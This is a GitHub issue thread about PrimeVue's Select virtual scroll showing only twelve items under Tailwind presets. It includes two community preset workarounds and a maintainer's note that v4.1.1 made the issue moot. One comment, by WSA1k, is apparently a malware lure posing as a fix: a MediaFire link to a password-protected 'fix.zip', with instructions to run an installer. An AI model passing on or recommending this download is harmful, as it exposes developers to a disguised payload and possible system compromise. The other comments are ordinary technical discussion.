### ISSUE TITLE
Select: Virtual scroll only rendering the first 12 values (Tailwind) 

### ISSUE THREAD

**Issue by 1H-Alex** [primefaces/primevue-tailwind#316]
### Describe the bug

The Select component with virtual scroll activated only displays the first 12 values. After those values, the list is empty. The length of the list still seems to represent all of the values.

Please note that **Stackblitz preview** of the [official demo of the virtual scroll for the Select component in the Tailwind version of Primevue](https://tailwind.primevue.org/select/#virtualscroll) is not working correctly due to main.js trying to import none-existing components. Even if sanitized, the virtual scroll functionality in the Select component is still not working. When running this example with the latest version of Primevue (4.0.5), as seen in the example below, the code is still not working as expected. 

 **The 4.0.1 version with Tailwind** is also not working, see [example](https://stackblitz.com/edit/1kgcmj?file=package-lock.json). 

 **The 4.0.5 version without Tailwind** seems to be working, see [example](https://stackblitz.com/edit/hbm2yo?file=package.json).

### Reproducer

https://stackblitz.com/edit/tmzwfq?file=package.json

### PrimeVue version

4.0.5

### Preset

Lara

### Vue version

3.4.5

### Language

ES6

### Build / Runtime

Vite

### Browser(s)

Chrome V 127, Safari V 17.5 (19618.2.12.11.6), FF V 128

### Steps to reproduce the behavior

1. Click the Select input field
2. Scroll down
3. See that the list only shows the first 12 values and then an empty list. 

### Expected behavior

1. Click the Select input field
2. Scroll down
3. New values should appear as needed

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Nagell** [comment]
+1

**Comment by darioillusorium** [comment]
Hi! Is a problem of VirtualScroll itself, not only in Select. I have experienced this problem on a DataTable using unstyled PrimeVue. VirtualScroller seems not to be adapted to unstyled so I have had to manually create the style of the virtualscroll within the tailwind presets (looking at the style of the classes that are used in styled mode). Specifically I use aura ( [(github)](https://github.com/primefaces/primevue-tailwind/releases) ) so I have created "virtualscroller/index.js" within "presets/aura" with this content:

```
export default {
    root: {
        class: [
            'relative overflow-auto [contain:strict] [transform: translateZ(0)] will-change-scroll [outline: 0 none]'
        ]
    },
    content: {
        class: [
            'absolute top-0 left-0 min-h-full min-w-full will-change-transform',
        ]
    },
    spacer: {
        class: [
            'absolute top-0 left-0 h-px w-px [transform-origin: 0 0] pointer-events-none'
        ]
    }
};

```

This work for me. I hope it helps if you are user Tailwind Pressets from Github

**Comment by Nagell** [comment]
Hi, in Lara styling we had to modify it a bit by forcing the height of the root element to be 12rem. 
Without it we have had double scrollbar. 

This is our solution (also as a `virtualscroller/index.js` imported in the `index.js` in the presets directory):

```js
export default {
    root: {
        class: [
            'relative overflow-auto [contain:strict] [transform:translateZ(0)] will-change-scroll outline-0 !h-48'
        ]
    },
    content: {
        class: [
            'absolute top-0 left-0 min-h-full min-w-full will-change-transform',
        ]
    },
    spacer: {
        class: [
            'absolute top-0 left-0 h-px w-px origin-top-left pointer-events-none'
        ]
    }
}

```

**Comment by cagataycivici** [comment]
As of v4.1.1, the new Tailwind styles have been rewritten using the [preprocessor](https://tailwindcss.com/docs/using-with-preprocessors) approach with @apply instead of pass-through. As a result this issue is not relevant any more.

New Website is [live](https://tailwind.primevue.org).
